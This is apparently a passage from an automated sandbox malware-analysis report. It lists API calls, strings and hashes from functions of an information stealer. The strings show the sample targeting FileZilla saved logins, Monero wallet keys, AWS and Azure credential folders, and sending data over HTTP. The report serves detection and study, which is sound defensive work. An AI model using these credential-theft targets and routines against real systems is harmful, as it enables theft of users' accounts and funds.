                                  • lstrcat.KERNEL32(?,00801770), ref: 007F0702
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F0715
                                  • lstrcat.KERNEL32(?,00801774), ref: 007F0724
                                  • lstrcat.KERNEL32(?,login: ), ref: 007F0733
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F0746
                                  • lstrcat.KERNEL32(?,00801780), ref: 007F0755
                                  • lstrcat.KERNEL32(?,password: ), ref: 007F0764
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F0777
                                  • lstrcat.KERNEL32(?,00801790), ref: 007F0786
                                  • lstrcat.KERNEL32(?,00801794), ref: 007F0795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F07EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: c25e913999fbe8895b5cbe253f740cd9a291dda8f67cb9b97b9cc7f0ee89206a
                                  • Instruction ID: c9f54f369e3731dd98e92491aee20a4f6f1dfbe232bb0e6258baca8c1a7c0974
                                  • Opcode Fuzzy Hash: c25e913999fbe8895b5cbe253f740cd9a291dda8f67cb9b97b9cc7f0ee89206a
                                  • Instruction Fuzzy Hash: BBD102B191020CEBCF04EBE4DD5AEFD7739AF54300F408654F216B62A6DB78AA45CB61
                                  Function 007E59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                    • Part of subcall function 007E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E5A48
                                  • StrCmpCA.SHLWAPI(?,0145E350), ref: 007E5A63
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E5BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0145E250,00000000,?,01459E88,00000000,?,00801B4C), ref: 007E5EC1
                                  • lstrlen.KERNEL32(00000000), ref: 007E5ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 007E5EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E5EEA
                                  • lstrlen.KERNEL32(00000000), ref: 007E5EFF
                                  • lstrlen.KERNEL32(00000000), ref: 007E5F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E5F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 007E5F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E5F7F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 007E5F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 007E6000
                                  • InternetCloseHandle.WININET(00000000), ref: 007E600D
                                  • HttpOpenRequestA.WININET(00000000,0145E340,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E5C48
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 007E6017
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: d54b40c9900a59a57100e8b9e7c333a6134f713d662581292233b7f1a7654ce1
                                  • Instruction ID: 521502f92d0a4d2bb9f1bd1411199bba3602d46c77a3eb1e9f1320236dbafbb4
                                  • Opcode Fuzzy Hash: d54b40c9900a59a57100e8b9e7c333a6134f713d662581292233b7f1a7654ce1
                                  • Instruction Fuzzy Hash: 7312CFB192011CFBCB15EBA4DCA9FFEB379BF54700F004199B20A62291DF746A49CB65
                                  Function 007ECFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007ED1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007ED1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED308
                                  • lstrcat.KERNEL32(?,00801570), ref: 007ED317
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED32A
                                  • lstrcat.KERNEL32(?,00801574), ref: 007ED339
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED34C
                                  • lstrcat.KERNEL32(?,00801578), ref: 007ED35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED36E
                                  • lstrcat.KERNEL32(?,0080157C), ref: 007ED37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED390
                                  • lstrcat.KERNEL32(?,00801580), ref: 007ED39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED3B2
                                  • lstrcat.KERNEL32(?,00801584), ref: 007ED3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 007ED3D4
                                  • lstrcat.KERNEL32(?,00801588), ref: 007ED3E3
                                    • Part of subcall function 007FAB30: lstrlen.KERNEL32(007E4F55,?,?,007E4F55,00800DDF), ref: 007FAB3B
                                    • Part of subcall function 007FAB30: lstrcpy.KERNEL32(00800DDF,00000000), ref: 007FAB95
                                  • lstrlen.KERNEL32(?), ref: 007ED42A
                                  • lstrlen.KERNEL32(?), ref: 007ED439
                                    • Part of subcall function 007FAD80: StrCmpCA.SHLWAPI(00000000,00801568,007ED2A2,00801568,00000000), ref: 007FAD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 007ED4B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: ea5543f2591433b3c514a7cfe42e0f8763a63ee739f1f6a6b7bb80f749f05059
                                  • Instruction ID: 5dd79a5e7908412b16908096139b2336db58cd6b63aff6105d87051d13017fc2
                                  • Opcode Fuzzy Hash: ea5543f2591433b3c514a7cfe42e0f8763a63ee739f1f6a6b7bb80f749f05059
                                  • Instruction Fuzzy Hash: FEE116F1910108EBCB04EBE4DD9AEFE7339AF54301F104555F20A762A2DE79AE09CB65
                                  Function 007ECA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0145CE80,00000000,?,00801544,00000000,?,?), ref: 007ECB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 007ECB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 007ECB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007ECBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 007ECBD9
                                  • StrStrA.SHLWAPI(?,0145CF58,00800B56), ref: 007ECBF7
                                  • StrStrA.SHLWAPI(00000000,0145CFA0), ref: 007ECC1E
                                  • StrStrA.SHLWAPI(?,0145D6F8,00000000,?,00801550,00000000,?,00000000,00000000,?,014589B0,00000000,?,0080154C,00000000,?), ref: 007ECDA2
                                  • StrStrA.SHLWAPI(00000000,0145D698), ref: 007ECDB9
                                    • Part of subcall function 007EC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007EC971
                                    • Part of subcall function 007EC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007EC97C
                                  • StrStrA.SHLWAPI(?,0145D698,00000000,?,00801554,00000000,?,00000000,01458890), ref: 007ECE5A
                                  • StrStrA.SHLWAPI(00000000,01458B00), ref: 007ECE71
                                    • Part of subcall function 007EC920: lstrcat.KERNEL32(?,00800B47), ref: 007ECA43
                                    • Part of subcall function 007EC920: lstrcat.KERNEL32(?,00800B4B), ref: 007ECA57
                                    • Part of subcall function 007EC920: lstrcat.KERNEL32(?,00800B4E), ref: 007ECA78
                                  • lstrlen.KERNEL32(00000000), ref: 007ECF44
                                  • CloseHandle.KERNEL32(00000000), ref: 007ECF9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 5f29e6985884edad5885965964d67be9ee1a8d94fd9c27c52055be56c249a71c
                                  • Instruction ID: 97da28a06bfbec6d9c4086d958bd25a7213fbe6d9685491bbc08759ce3d7b364
                                  • Opcode Fuzzy Hash: 5f29e6985884edad5885965964d67be9ee1a8d94fd9c27c52055be56c249a71c
                                  • Instruction Fuzzy Hash: C9E1BEB191010CFBCB15EBA4DCA5FFEB779AF54300F004159F20A662A2DF786A49CB65
                                  Function 007F84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,0145AA40,00000000,00020019,00000000,008005BE), ref: 007F8534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007F85B6
                                  • wsprintfA.USER32 ref: 007F85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007F860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F8629
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: cd84637b8b9df5f3980849a490f75603d7a645e567063678236d635e00b2b933
                                  • Instruction ID: 32cb0ed36d02f0e277933ee516c817206f56612bac8151f3fc2f75c882329465
                                  • Opcode Fuzzy Hash: cd84637b8b9df5f3980849a490f75603d7a645e567063678236d635e00b2b933
                                  • Instruction Fuzzy Hash: F2812EB191011CEBDB64DB94CD95FEA77B8BF48300F1082D8E209A6291DF746B85CFA1
                                  Function 007F4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F5000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 007F501D
                                    • Part of subcall function 007F4B60: wsprintfA.USER32 ref: 007F4B7C
                                    • Part of subcall function 007F4B60: FindFirstFileA.KERNEL32(?,?), ref: 007F4B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 007F50A9
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,00800FC4), ref: 007F4BC1
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,00800FC8), ref: 007F4BD7
                                    • Part of subcall function 007F4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DCD
                                    • Part of subcall function 007F4B60: FindClose.KERNEL32(000000FF), ref: 007F4DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F5118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007F5135
                                    • Part of subcall function 007F4B60: wsprintfA.USER32 ref: 007F4C00
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,008008D3), ref: 007F4C15
                                    • Part of subcall function 007F4B60: wsprintfA.USER32 ref: 007F4C32
                                    • Part of subcall function 007F4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 007F4C6E
                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,0145E300), ref: 007F4C9A
                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,00800FE0), ref: 007F4CAC
                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,?), ref: 007F4CC0
                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,00800FE4), ref: 007F4CD2
                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,?), ref: 007F4CE6
                                    • Part of subcall function 007F4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 007F4CFC
                                    • Part of subcall function 007F4B60: DeleteFileA.KERNEL32(?), ref: 007F4D81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 18e043dbd05bb5761bc91397f021eb5b7dc2fd582ebf6162b1d647f8e91e763d
                                  • Instruction ID: ee61bbf9cefa94a7723889cfe095a7e9ac12be21c255fb35821363e75a58e9ce
                                  • Opcode Fuzzy Hash: 18e043dbd05bb5761bc91397f021eb5b7dc2fd582ebf6162b1d647f8e91e763d
                                  • Instruction Fuzzy Hash: 914198F9940208A7DB54E770EC9BFED73389B64700F404554B299A52C2EDB85BC88B92
                                  Function 007F91A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007F91FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
